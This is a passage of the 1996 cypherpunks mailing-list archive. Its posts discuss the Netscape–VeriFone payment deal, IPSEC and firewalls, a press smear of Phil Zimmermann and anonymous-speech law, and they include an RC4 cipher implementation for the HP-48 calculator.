Content-Type: text/plain


**I blew it.**  Don's address is don@cam.ov.com.  Sorry.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Mon, 22 Jan 96 21:03:19 PST
To: cypherpunks@toad.com
Subject: Query over PZ
Message-ID: <199601230500.AAA20166@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous User had a question over PZ's politics. 
 
PZ has posted to the list and thus has, I believe, his address available to
list subscribers. 
 
How did PZ answer the question privately when Anonymous User posed the
question to PZ on private e-mail? 
 
If Anonymous User did not first pose the question to PZ privately, why did
he post it to the list publically? 
 
-- 
tallpaul 
 
PS: I'm likely to have some followup on these questions, but wanted to pose
them to AU first.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Mon, 22 Jan 96 21:23:30 PST
To: "'cypherpunks@toad.com>
Subject: FW: Veriphone and Netscape Team to Provide Internet Payment Solutions
Message-ID: <01BAE929.12D6ADE0@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


Here's the Netscape press release on their Verifone collaboration;
note that they explain nothing about 128 bits or 1024 bits--but Netscape
now appears to claim to be the sole developers of SEPP.

It looks like Verifone will be building their approval/verification mechanism
into a Netscape product, and selling it themselves.

I've removed contact info and the source at Netscape (in their PR
dept), just to avoid unnecessarily nettling anyone.  Presumably 
Netscape shouldn't be able to complain about it getting passed around
since it will likely be the basis of reports in various trade/news rags by
next week anyway.  Enjoy.

-Pete Loshin
 pete@loshin.com

----------

COPITHORNE & BELLOWS (for VeriFone)
[contact info deleted]

VERIFONE, INC.
[contact info deleted]

NETSCAPE
[contact info deleted]

VeriFone and Netscape Team To Provide Internet Payment Solutions Worldwide

Leaders To Accelerate Commerce on the Internet
REDWOOD CITY, Calif. - January 22, 1996 - VeriFone, Inc. (NYSE: VFI),  and
Netscape Communications Corporation (NASDAQ: NSCP) today announced an
agreement to create comprehensive Internet payment solutions, enabling
merchants, banks, credit card companies and consumers to expand the use of
the Internet for electronic commerce.
The agreement between VeriFone, the world leader in retail electronic
payment systems, and Netscape, the premier provider of open software for
linking people and information over enterprise networks and the Internet,
is designed to accelerate acceptance of the Internet as a mainstream
vehicle for commerce.
Under terms of the agreement, the two companies will join forces to address
the transaction processing needs of both financial institutions and
merchants. For financial institutions, Netscape's gateway software and
VeriFone's payment technology will be combined to create a seamless
interface between the Internet and existing financial networks.  VeriFone
will also provide customization, installation and support services for
these customers.
To serve merchants, VeriFone will resell Netscape's server and commerce
products bundled with VeriFone payment functionality to deliver complete
software solutions for merchants who want to broaden their reach by
establishing a commercial presence on the Internet. VeriFone will provide
merchants with these solutions through its existing customers and channels.
Netscape and VeriFone create a combination that is uniquely qualified to
fulfill the promise of global electronic commerce.  VeriFone's
point-of-sale systems for online payment processing and credit card
verification are among standards recognized by thousands of banks, credit
card and debit card processors, and millions of merchants and consumers
throughout the world.  VeriFone's solutions today address the technology
standards, payment methods and government regulations of over 90 countries
around the world, enabling the two companies to accelerate their goal of
deploying Internet payment systems worldwide.
"Netscape's agreement with VeriFone will bring a comprehensive Internet
payment solution to merchants, banks, credit card companies and consumers
which will continue to fuel electronic commerce worldwide," said James
Barksdale, chief executive officer at Netscape.  "By combining VeriFone's
electronic payment technology with Netscape's complete line of server and
commerce software products, financial institutions  and merchants can
implement a complete payment solution."

Creating Comprehensive Payment Solutions
The new solutions will be designed to be compatible with current and future
credit card payment protocols, including Secure Electronic Payment Protocol
(SEPP), developed by Netscape.  The two companies are working with leading
card associations and processors to include additional protocols,
supporting future payments instruments such as micropayments and debit
transactions.
"To truly enable Internet commerce, banks, credit card companies, merchants
and consumers need a trusted interoperable system as accessible and secure
as current payment systems," said Hatim A. Tyabji, chairman, president and
chief executive officer  of VeriFone.  "Consumers need to know they can
safely pay for something electronically, merchants need to know they can
safely accept it, and banks and other financial organizations need to be
able to process it.  Our goal is to give merchants the same 'plug and play'
payment access on the Internet that they have come to expect in their
retail stores."
VeriFone expects the integrated Netscape/VeriFone Internet gateway systems
for financial institutions and the merchant systems to become available in
the second to third quarters of 1996 from VeriFone, with increasing payment
protocols and enhancements becoming available throughout the year.

Company Backgrounds
Netscape Communications Corporation (http://www.netscape.com) is a premier
provider of open software for linking people and information over
enterprise networks and the Internet.  The company offers a full line of
Netscape Navigator clients, servers, development tools, and Netscape
Internet Applications to create a complete platform for next-generation,
live online applications. Traded on NASDAQ under the symbol "NSCP,"
Netscape Communications Corporation is based in Mountain View, California.

VeriFone, Inc. (http://www.verifone.com) is a leading global provider of
Transaction Automation and Internet commerce solutions used to deliver
electronic payment services to financial institutions, retail merchants and
consumers, as well as government agencies, healthcare providers and
benefits recipients.  The company's more  than 30 facilities -- including
regional offices, development centers, and manufacturing and distribution
centers -- are located throughout North and South America, Europe, Asia,
Africa and Australia.  To date, VeriFone has shipped more than 4.8 million
Transaction Automation systems, which have been installed in over 90
countries.  The company's 1994 net revenues totaled $309.1 million.
In 1995, VeriFone acquired Enterprise Integration Technologies
(http://www.eit.com) -- a leading provider of software and consulting
services for electronic commerce on the Internet.
 (30)
VeriFone is a registered trademark of VeriFone, Inc.  All other brand names
and trademarks are the property of their respective owners.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Mon, 22 Jan 96 21:23:31 PST
To: "cypherpunks@toad.com>
Subject: RE: IPSEC == end of firewalls (was Re: (fwd) e$: PBS NewsHour, Path Dependency, IPSEC, Cyberdog, and the Melting of Mr.)
Message-ID: <01BAE929.17AF3800@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


More to the point, I don't think it's possible to trust the 
security of the network software USERS in any case.

-Pete Loshin
 pete@loshin.com

Perry Metzger wrote:
>Nelson Minar writes:
>> I'm all for the end of ridiculous non-TCP/IP protocols, but does
>> anyone believe this point about encrypted IP traffic eliminating the
>> need for firewalls?
>
>There is division in the IETF community on this point.
>
>Phil Karn (who I have the greatest respect for) thinks IPSEC means we
>can get rid of the firewalls. I, for one, don't -- they are there
>largely because people don't trust that their networking software is
>free of security holes, and cryptography doesn't fix security holes
>for the most part.
>
>Perry







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Mon, 22 Jan 96 21:23:35 PST
To: "'cypherpunks@toad.com>
Subject: [noise] Internet censorship in the workplace
Message-ID: <01BAE929.1949AE20@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


A front-page article today in Network World about censoring 
access to sex-related Internet resources at the office.
Apparently, at Texaco, "a woman vehemently opposed
to pornography" has been assigned to review logs showing
who's been looking at what.  Workers who log onto remote
sites from Texaco to disguise their interests have not been
fooling this individual.

-Pete Loshin
 pete@loshin.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 22 Jan 96 15:30:07 PST
To: cypherpunks@toad.com
Subject: Re: CIA Stashes and Looted Gold?
Message-ID: <199601222329.AAA04627@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



U.S. Hid Weapons In Austria
     
Vienna, Austria, Jan 21 (AP) -- Fearful of a Soviet
takeover after World War II, the United States hid at
least 79 weapons caches in Austria for anti-communist
partisans.

According to the newspaper Kurier, a U.S. congressional
committee monitoring CIA activities found documents on
the weapons caches that had not been known to the Clinton
administration.  

A report Saturday in the Boston Globe prompted Hunt to
inform the Austrian government, Kurier said.

The Boston Globe report said CIA agents stashed the
weapons while the U.S. military conducted loud military
maneuvers.

However, Fritz Molden, a former Austrian journalist, said
Sunday that the secret weapons depots were established at
the initiative of the Austrian government led by
Chancellor Leopold Figl, and planning for them began in
1948. He claimed that some depots were also placed in the
Soviet occupation zone in eastern Austria.

Molden told the APA he had acted as a liaison between the
Americans and the postwar Austrian government. However,
it was not clear why the information was not handed down
to subsequent governments.

--

Austria demands details on secret US arms depots

Vienna, Austria, Jan. 21 (Reuter) -- Austria's leadership
Sunday demanded the United States supply details of 79
secret U.S. arsenals scattered across Austria.

"The Americans should give us a plan indicating where the
weapons depots are, how serious they have to be taken and
what dangers they pose," Chancellor Franz Vranitzky said. 

Speaking on television Sunday, Vranitzky cautiously 
indicated the possibility of secret stockpiles from the
other occupation forces -- France, Britain and the Soviet
Union.

"Approaching the other three occupation powers and asking
them whether they too still have secret depots on
Austrian soil will be dealt with in a very pragmatic and
sensible way," Vranitzky said.

The chancellery said the U.S. government was working on
an exact list detailing the locations of the depots, and
U.S. Ambassador Hunt promised to furnish details as
quickly as possible.  

The television said experts assume each of the arsenals 
contained sufficient weapons and explosives for 150 
anti-communist guerrillas and could also contain
significant amounts of gold.  

Austrian television said that while the U.S. foreign 
ministry had assured Austria it would act as soon as
possible, the CIA, which alone knows the exact locations
of the arsenals, has remained silent on the issue.

--

Postwar leaders acted with U.S. on arms caches

Vienna, Austria, Jan. 22 (Reuter) - Austria's postwar
leaders cooperated with the United States to stockpile
arms around the country in a top-secret operation to
safeguard against a Soviet attack, an ex-resistance
fighter said Monday.

Fritz Molden, who acted as a liaison officer between the 
resistance and the allied powers, said that if the
Kremlin had discovered the plan to organize an
anti-communist underground, Soviet troops would have
immediately annexed eastern Austria.

"It was all top secret. There were no archives, no papers
made, no protocols written," Molden told Reuters.  

Molden said he was surprised that Austria's current 
political leaders were unaware of the arsenals. Details
had appeared in two books, one of which he wrote 16 years
ago.

Austrian media speculated that the arsenals were part of
a wider anti-communist strategy by the United States,
which feared Soviet expansionism following the end of
World War II.

Newspapers cited the Gladio operation in Italy, set up as
a secret Cold War resistance group in the 1950s to fight
any Warsaw Pact invasion.

Austrian experts estimated the depots held enough weapons
and explosives for 150 anti-communist guerrillas and
might also contain gold. They said likely sites included
graveyards where digging would have gone unnoticed.

Molden said arms were transported on U.S. trucks and
trains into Vienna, which was surrounded by the Soviet
eastern zone, and then secretly passed on to Austrians
who risked their lives stashing the weapons away.

He suspected most arsenals in western Austria were handed
over to the Austrian army and gendarmerie after 1955 and
that the arms sites in eastern Austria might now also be
empty.

--












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Mon, 22 Jan 96 21:32:09 PST
To: tallpaul@pipeline.com (tallpaul)
Subject: Re: Query over PZ
Message-ID: <v01530502ad2a21fe0411@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:00 AM 1/23/96, tallpaul wrote:
>Anonymous User had a question over PZ's politics.
>
>PZ has posted to the list and thus has, I believe, his address available to
>list subscribers.
>
>How did PZ answer the question privately when Anonymous User posed the
>question to PZ on private e-mail?
>
>If Anonymous User did not first pose the question to PZ privately, why did
>he post it to the list publically?

Seems to me Ms. Anonymous wasn't taking it seriously, but was posting the
news clip here for our amusement, or to show the kind of shabby work some
journalists do, or to scare us by demonstrating how insane rumors get
started.

I can't imagine that anyone who knows the address of the cypherpunks list
and can use an anonymous remailer could take a ridiculous claim like that
seriously.

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://www.wfmu.org/~davem






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <dm@amsterdam.lcs.mit.edu>
Date: Mon, 22 Jan 96 22:55:16 PST
To: adam@lighthouse.homeport.org
Subject: Re: Why is blowfish so slow?  Other fast algorithms?
In-Reply-To: <199601221620.LAA20745@homeport.org>
Message-ID: <199601230654.BAA21318@amsterdam.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> From: Adam Shostack <adam@lighthouse.homeport.org>
> Date: Mon, 22 Jan 1996 11:20:57 -0500 (EST)
> Cc: cypherpunks@toad.com
> X-Mailer: ELM [version 2.4 PL24 ME8b]
> Content-Type: text
> Content-Length:        662
> 
> David Mazieres wrote:
> 
> | First, can someone tell me if the latest version of blowfish (the one
> | in Applied Crypto 2nd edition) is available online somewhere?  I
> | looked at a bunch of crypto ftp servers and could only find an older
> | version of blowfish that did not have the blf_ctx structure allowing
> | multiple keys to be active at a time.
> 
> Did you check ftp.dsi.unimi.it?  I seem to remember them having the
> latest source right after Crypto95.  Also, ftp.csua.berkeley.edu
> should have it.  (Their code is version 1.3; do you know what version
> you're after?)

Unfortunately, neither of those sites have it.

The version I'm looking for has a blf_ctx structure that gets passed
as the first argument to functions so you can use multiple keys at a
time.  It also has the initialization data stuck in the C code.

Does anyone out there have the Applied Cryptography source code
diskette?  Would you be willing to mail me the code?  It would
probably take a while if I ordered the diskette myself and I'd like to
get the code as soon as possible.

Thanks,
David




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scott Staedeli" <scottst@ionet.net>
Date: Tue, 23 Jan 96 00:07:51 PST
To: cypherpunks@toad.com
Subject: Re: The Collapse of Ideas in a Pop Culture
Message-ID: <199601230805.CAA03513@ion1.ionet.net>
MIME-Version: 1.0
Content-Type: text/plain


>(If you don't know who Jules Bergmann was, you're a GenXer and
> can't be held responsible for your ignorance :-}.)

   I _am_ a GEnXer, and I worshipped Jules Bergmann as a child. Some
of my first memories is pressing my nose up to the tv, watching Saturn
V's lifting off. If I ever win the lottery, I'm going to take the Saturn that's 
lying on it's side at Cape Kennedy, refurbish it, and launch that baby 
just to watch it go. ;-)))

-
--scottst@ionet.net---------------------Scott Staedeli--
   >~<^xXx       | "Information is the currency of  
        xX   #   | democracy."
      (XXX) #    | 
    (XXXXXXX)    |    
DON'T TREAD ON ME|           --Thomas Jefferson
========================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <printing@explicit.com>
Date: Tue, 23 Jan 96 00:11:48 PST
To: Cypherpunks@toad.com
Subject: Re: Netscape + Verifone (Noise)
In-Reply-To: <UPMAIL08.199601230556130031@msn.com>
Message-ID: <3104B393.31A3@explicit.com>
MIME-Version: 1.0
Content-Type: text/plain


Steve, 

> What is the frequency on the back of your pager?  Some people 
> would like to monitor this type of information.

Depending on the service offering the paging, You can get news headlines
and sport scores, ESPN I belive has play by play for real sporting
junkies. RadioMail has this service for no extra charge if you go that 
route.  http://www.radiomail.net/

William Knowles
President & Big Kahuna
Graphically Explicit
 
> ----------
> From:  owner-cypherpunks@toad.com on behalf of Perry E. Metzger
> Sent:  Monday, January 22, 1996 11:13
> To:  cypherpunks@toad.com
> Subject:  Netscape + Verifone
> 
> My pager delivers me selected miniaturized Reuters news stories.
> 
> I just got one that reads:
> 
>    REDWOOD CITY, CA - Netscape Communications Corp. and Verifone
>    Inc. will devise a system to make electronic payments on the
>    internet more secure.
> 
> Anyone know anything about this? I'm away from my normal sources of
> such things (like Bloomberg terminals)...
> 
> .pm

--
Graphically Explicit Advertising      <printing@explicit.com>
PGP mail welcome & prefered / KeyID 1024/415D7FF9
PGP Fingerprint D3 34 A4 38 73 99 77 4A  98 BB A2 81 97 68 73 03




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Mon, 22 Jan 96 18:22:03 PST
To: cypherpunks@toad.com
Subject: RC4 for HP48
Message-ID: <199601230223.CAA11426@pangaea.hypereality.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
	Here is the RC4 cipher for the HP-48 calculator.  It 
complements the DES implementation by William E. Sommerfeld.  
RC4 has a higher throughput than DES, but its key setup is 
slower.  The key may be up to 256 characters (2048 bits) -- 
the maximum supported by the RC4 algorithm.
 
Here are sample timings for a HP-48GX.  The SX will be 
correspondingly slower.
Key Setup (200 bits)     25.18 sec
RC4 throughput            5.06 cps
String to Array          61.83 cps
Array to String          56.12 cps
 
	The HP-48 comes with a 2400 baud IR link and a 
1200/2400/9600 baud RS232 port.  The 48S, 48SX and 48G have 
32Kb of RAM, almost none of which is used by the operating 
system.  The 48GX has 128Kb of RAM.  With an entry price of 
~100$ US, I feel that the HP-48 series would be a good choice 
for a smart token.  Possible uses are as digital cash wallets 
and authentication tokens, not the mention simple encrypted 
dumb terminals.
 
Installation:
 
	If you have a serial cable, download the code below to 
your HP and call it 'RC4'.  This will create a directory 
called 'RC4' with four programs in it.  If you don't have a 
cable you can type the whole thing in; it's not too large.  
Store it as 'RC4' and again it will create a directory.  Remember
not to type the "%%HP: T(3)A(D)F(.);" -- it's only needed for
a serial download.
 
Instructions:
 
	These instructions assume that you are familiar with 
stream-ciphers in general.  If you are not, you might want to 
get _Applied Cryptography_ by Bruce Schneier from your library 
or book store.
 
	Bit streams are represented as one dimensional arrays of 
real numbers between 0 and 255.  Yes, that's right, this 
cipher uses floating-point!  In User-RPL it's the fastest way.  
To convert between strings and arrays use the commands S2A and 
A2S.
 
	S2A     "String" -> [Array]
	A2S     [Array] -> "String"
 
	To setup a key, use the SK command.  It takes a 
bitstream representing the keytext and returns the key 
context.  They keytext can be up to 256 bytes long.  
Additional bytes will not be used.  The key context is another 
bitstream with 256 values in it.  Because of time/memory 
tradeoffs, a key context takes 2082 bytes of RAM to store.  If 
memory is tight, use A2S to compress the key context to a 
string.
 
	SK      [Key text] -> [Key context]
 
	To encrypt something use the RC4 command.  The first 
argument is the key context, the second is the plaintext or 
ciphertext, both in bitstream form.  It returns the updated 
key context and the ciphertext or plaintext.
 
RC4     [Key context], [Plaintext] -> 
	   [New key context], [Ciphertext]
or
RC4     [Key context], [Ciphertext] -> 
	   [New key context], [Plaintext]
 
Enjoy
	The Cunning Artificers
 
- -- CUT HERE --
%%HP: T(3)A(D)F(.);
DIR
  SK
    \<< DTAG OBJ\-> OBJ\-> DROP 0 255
      FOR N N NEXT 259 258
      PICK + 0 259 4 FOR N OVER
      PICK N PICK + + 256 MOD DUP 255 - NEG N
      4 - DUP2 IF \=/
	THEN DUP2
	  IF >
	    THEN SWAP
	  END 
	  DUP2 6 + ROLL SWAP 6 +
	  ROLL SWAP 4 ROLL 5 + ROLLD SWAP 3 +
	  ROLLD
	ELSE 
	  DROP2
	END SWAP 1 - DUP
	IF 260 <
	THEN 
	  DROP 258 PICK 259 +
	END SWAP -1
      STEP DROP2 0
      0 258 \->ARRY OVER 2
      + ROLLD DROPN "Key"
      \->TAG
    \>>
  RC4
    \<< DTAG DUP SIZE OBJ\-> DROP 3 PICK
	258 GET 4 PICK 257 GET 1 + 1 4 ROLL
	FOR N 256 MOD 1 + DUP 5 PICK SWAP
	GET 3 ROLL + 256 MOD 1 + DUP 5 ROLL
	SWAP 4 PICK CSWP DUP DUP 5 PICK GET
	OVER 5 PICK GET + 256 MOD 1 + GET 5
	ROLL DUP N GET R\->B 3 ROLL R\->B XOR B\->R
	N SWAP PUT 4 ROLL 4 ROLL 1 - SWAP
	NEXT 4 ROLL 257 3 ROLL 1 - PUT
	258 3 ROLL PUT "Updated key" \->TAG
	SWAP "Result" \->TAG
    \>>
  S2A
    \<< DUP SIZE
      \<< \-> LEN
	\<< 1 LEN
	  START DUP NUM SWAP TAIL
	  NEXT DROP LEN
	\>>
      \>> EVAL 1
      \->LIST \->ARRY
    \>>
  A2S
    \<< DTAG OBJ\-> OBJ\-> DROP "" SWAP 1
	SWAP START SWAP CHR SWAP + NEXT
    \>>
END
- -- CUT HERE --
 
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2
 
mQCNAzEAEf4AAAEEAMONoLHj5CwKvaM6ch9GOcUjgoVS5sjXa4TzD2ohhtHFYR9l
QzNj0vNASBQKE/Mk9Flqg+dtitS7S7B0qZQ+mQmMT73yniun596jt1NCJ5sLBKrM
jDvYK3wGbycVX43RBiR3iwJZGq5blfWqNRE7kFdTxgu+bCdtLOFNVew9oBf9AAUR
tBZUaGUgQ3VubmluZyBBcnRpZmljZXJz
=pf3Y
- -----END PGP PUBLIC KEY BLOCK-----
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
iQCVAwUBMQRCWuFNVew9oBf9AQEPJgP/QzwxGIWU0sf+a8Vzj2tXtMqRhRQjG4Qp
Pcrwr76WhM/2KnHGNAdC3lKwyEK17cu32zbmPePhOvtdUNyV3L1KZlBioURK5Kxu
ZspnOLCmlKo8lbOa5mJl2bmV55W49B96ua+yxst1XaOzhfYDN/KjZsztGRnEbQx9
VovMpLXooLo=
=4pzv
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: take@imasy.or.jp (Hayashi_Tsuyoshi)
Date: Mon, 22 Jan 96 09:29:29 PST
To: John Young <jya@pipeline.com>
Subject: Re: NYT New Web Site
Message-ID: <199601221728.CAA28295@tasogare.imasy.or.jp>
MIME-Version: 1.0
Content-Type: text/plain


Dear Mr. John Young,

This is Tsuyoshi Hayashi.

At 11:18 AM 96.1.22 -0500, John Young wrote:
>NYT reported today that it has set up a new web site: 
>http://www.nytimes.com

Now I visiting there.  It's very worth for me.
Very very thanks for your info. (^^)

>For the Times-addicted, today's WSJ has a page one article on 

Does WSJ have there own web site, too?

- Tsuyoshi Hayashi <take@imasy.or.jp>
--- hayashi@scs.sony.co.jp is no longer valid.
--- Please update to take@imasy.or.jp



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Pugh <ampugh@mci.newscorp.com>
Date: Mon, 22 Jan 96 23:56:06 PST
To: cypherpunks@toad.com
Subject: Re: You want to read MY e-mail?
Message-ID: <199601230748.CAA16825@kafka.delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


=snip=
>A bill by Sen. Paul Weissmann, R-Louisville, to make e-mail as privileged as
>telephone conversations was killed in a Senate committee.
>
>A somewhat stronger bill still rests in the House.
=snip=
>Jim Carpenter, press secretary for Romer, said his office was "looking at all
>the issues, all the options."
>
>Duke said he has always complied with requests for public records, but said the
>request for e- mail messages goes too far.
>
>"I'm disturbed by it," Duke said.
>
>(John Sanko writes for the Rocky Mountain News in Denver.)
>
>   OK, if _I_ can't read your e-mail Mr. Legislator, why should you
>be able to read _mine_?

a good question. perhaps _now_ they'll get serious about recognising email
as eqivalent to postal mail. this would be an excellent way of pushing this
elsewhere. when _their_ ox is gored, they'll scream like stuck pigs. 

one interesting aspect of this would be whether regular mail is considered a
public record under the law as far as legislooters mail goes. if so, then
she should get it.

amp





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Mon, 22 Jan 96 21:36:12 PST
To: Nelson Minar <nelson@santafe.edu>
Subject: Re: IPSEC == end of firewalls (was Re: (fwd) e$: PBS NewsHour, Path , Dependency, IPSEC, Cyberdog, and the Melting of Mr.)
In-Reply-To: <199601230159.SAA00256@nelson.santafe.edu>
Message-ID: <Pine.BSD.3.91.960123052304.13897C-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



    reply from attila:

	I agree there will be "universal" secrecy --there will always 
    someone who manages to decode one or two "signatures" including 
    handshakes, and spoofs them, after burying the sucker machine in
    response commands so it has a chance to grab the handshaking.

	a little group effort, a couple of fast machines to
    coordinate the attack, and rest just might be history.  seems
    to me both Netscape and the abominable creature from the 
    Pacific Northwest said they could not be broken....

	Personally, I think NSA has figured out how to break PGP --
    enough specialized DSPs and prime factoring tables on magneto-
    optical disks can go along way.  If you have traffic both ways,
    you have the hash as well.

	dropping Phil accomplished two basic things: a cheap give-
    away to look good in public; and, they avoided defending ITAR
    in court  --and the ninth circuit can be pretty cranky on the
    Bill of Rights  --they don't follow Washington's line too 
    well.




On Mon, 22 Jan 1996, Nelson Minar wrote:

> rah@shipwright.com (Robert Hettinga) writes:
> [interesting article about the future, which includes..]
> 
> >The reason we won't need LANs is because the only real difference between a
> >LAN and the internet is a firewall for security, and the need for clients
> >to speak Novell's TCP/IP-incompatible proprietary network protocol.  With
> >internet-level encryption protocols like the IETF IPSEC standard, you won't
> >even need a firewall anymore.  The only people who can establish a server
> >session with *any* machine connected to the net will be those issuing the
> >digital signatures authorized to access that machine, no matter where those
> >people are physically. When that happens, networks will need to be as
> >public as possible, which means, of course, TCP/IP, and not Netware.
> 
> I'm all for the end of ridiculous non-TCP/IP protocols, but does
> anyone believe this point about encrypted IP traffic eliminating the
> need for firewalls?
> 
> I guess I don't trust the ability for people to keep secrets secret.
> Nothing like refusing to pass packets at all..
> 

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Steve Makrecky" <Steve_Makrecky@msn.com>
Date: Mon, 22 Jan 96 22:03:17 PST
To: "Perry E. Metzger" <perry@piermont.com>
Subject: RE: Netscape + Verifone
Message-ID: <UPMAIL08.199601230556130031@msn.com>
MIME-Version: 1.0
Content-Type: text/plain


What is the frequency on the back of your pager?  Some people would like to 
monitor this type of information.

----------
From:  owner-cypherpunks@toad.com on behalf of Perry E. Metzger
Sent:  Monday, January 22, 1996 11:13
To:  cypherpunks@toad.com
Subject:  Netscape + Verifone


My pager delivers me selected miniaturized Reuters news stories.

I just got one that reads:

   REDWOOD CITY, CA - Netscape Communications Corp. and Verifone
   Inc. will devise a system to make electronic payments on the internet
   more secure.

Anyone know anything about this? I'm away from my normal sources of
such things (like Bloomberg terminals)...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Mon, 22 Jan 96 21:53:14 PST
To: cypherpunks@toad.com
Subject: Re: PZ a Nazi?
In-Reply-To: <199601230400.UAA29972@infinity.c2.org>
Message-ID: <Pine.BSD.3.91.960123054036.13897D-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 22 Jan 1996, Anonymous User wrote:

> Original dated: Jan 21 '96, 09:26
> 
	[snip]

> "Private communications between neo-Nazis on the network are
> effected under a program called "Pretty Good Privacy", devised by
> an American neo-Nazi sympathiser."
> 
>   Robin Gedye (in Bonn) p.23 of "The Sunday Telegraph" January 21,
>   1996
> 
    reply from attila:

	I would say we have two clueless mud slingers amongst us.

    1.	Robin Gedye (in Bonn) for ET who is not only clueless, but
	totally without journalistic ethicss in the of the muckraker
	and yellow journalism of the old line Hearst tabloid size
	newspapers.  to stir a fire on PZ sinc he wrote a virtually
	universal world wide crypto program is....

    2.	and closer to home, we have a yea-sayer mouse: "anonymous-
	user@c2.org" whose does not have the courtesy to pose 
	the question to PZ; and EVEN WORSE, slings mud anonymously.

	granted, PZ is just a man, but he's like you and I. would
    you not consider the source before opening the floodgates of
    character smear?  It sounds like you forgot to clutch in your
    brain before shooting from a duck-blind with your fingers.

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Mon, 29 Jan 96 22:38:40 PST
To: cypherpunks@toad.com
Subject: [UTTER NOISE]Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
Message-ID: <v0153050ead335c5a8dad@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


>> INFORMATION IS INSECURE THE MOMENT YOU TOUCH A KEY.
>
>> This does not mean that Internet commerce is dead.  Any scheme that is
>> not based on self-identifying one-way financial instruments such as
>> credit cards will be essentially unaffected by this problem.  Moreover,
>> even credit cards may be made safe on the Internet using one of two
>> approaches:  secure hardware add-ons and the First Virtual approach.

etc.

My name for this kind of software:

  Terminate and Stay Clueless


-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scott V. McGuire" <svmcguir@syr.edu>
Date: Sun, 29 Dec 1996 23:38:36 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Re: "Structuring" of Communications a Felony?
In-Reply-To: <v03007800aeec96b09112@[207.167.93.63]>
Message-ID: <Pine.LNX.3.95L01at.960130021446.937A-100000@homebox>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 29 Dec 1996, Timothy C. May wrote:

> At 1:35 PM -0800 12/29/96, Steve Schear wrote:
> 
... snip ...
 
> As to the "anonymous speech" rulings, I mainly know of the 1956 Georgia
> case, in which the Supremes struck down a law requiring that leaflets
> handed out have a name attached. I don't know of more recent rulings,
> especially ones related to the Internet.
> 
> (Why this is important is that the Supreme Court has often differentiated
> between types of speech. For example, ask a liquor or tobacco company if it
> has "freedom of speech." Ask those who put labels on their products if they
> have freedom of speech--the Federal Trade Commission, Food and Drug
> Administration, etc., declare what may not be said, what must be said, etc.
> First Amendment scholars are of course well aware that the First is not
> treated as an absolute.)
> 
> If origin-labelling is unconstitutional, as Steve claims, then on what
> basis can the U.S. Postal Service require identification for packages over
> one pound? Surely what is inside the package may be considered "speech" (by
> those interested in pushing the point).
> 

Unless the regulations apply to UPS, FED-EX etc., I don't see how the two
situations are comparable.  The government refusing to deliver packages
(via the USPS) unless certain conditions are met is not the same as saying
no one may deliver unless those conditions are met.  Now, passing email 
from its source, through  several remailers and to its destination does
not involve any government agency.  The government may still try to
control it, but they can't justify it by analogy to labeling of normal
mail (which they are involved in delivering).  

>
... snip ...

> As to how such regulations about origin-labeling might develop, here are
> several points:
> 
... snip ...

> 3. Civil libertarians will wail and will cite the 1956 Supreme Court case
> about leafletting. Lawyers on the other side will point out that all that
